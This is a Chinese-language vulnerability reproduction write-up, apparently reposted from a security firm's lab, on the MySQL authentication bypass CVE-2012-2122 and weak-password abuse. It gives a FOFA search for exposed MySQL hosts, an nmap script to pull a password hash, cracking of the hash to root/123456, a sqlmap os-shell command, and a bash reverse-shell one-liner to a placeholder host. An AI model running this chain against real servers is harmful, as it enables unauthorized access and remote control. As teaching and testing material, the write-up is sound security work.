漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

admin 2025年2月25日13:36:40评论43 views1字数 1143阅读3分48秒阅读模式

0x01 漏洞描述

MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle 旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(Relational Database Management System,关系数据库管理系统) 应用软件之一。当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞。

漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

0x02 漏洞复现

漏洞影响:所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

FOFA: app="mysql"

1.nmap使用mysql-vuln-cve2012-2122爆破Mysql,得到一个mysql5加密值

6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 x.x.x.x

漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

2.到CMD5解密,得到密码为123456,即账号:root 密码:123456

CMD5地址为:https://www.cmd5.com/

漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

3.利用sqlmap连接,连接成功,权限为mysql

sqlmap -d "mysql://root:[email protected]:3306/test" --os-shell --flush-session

漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

4.写入反弹shell的sh脚本到tmp目录,且赋予可执行权限,写入成功

echo "bash -i >& /dev/tcp/x.x.x.x/7777 0>&1" > /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh

漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)

0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog

原文始发于微信公众号(融云攻防实验室):漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月25日13:36:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用https://cn-sec.com/archives/847185.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息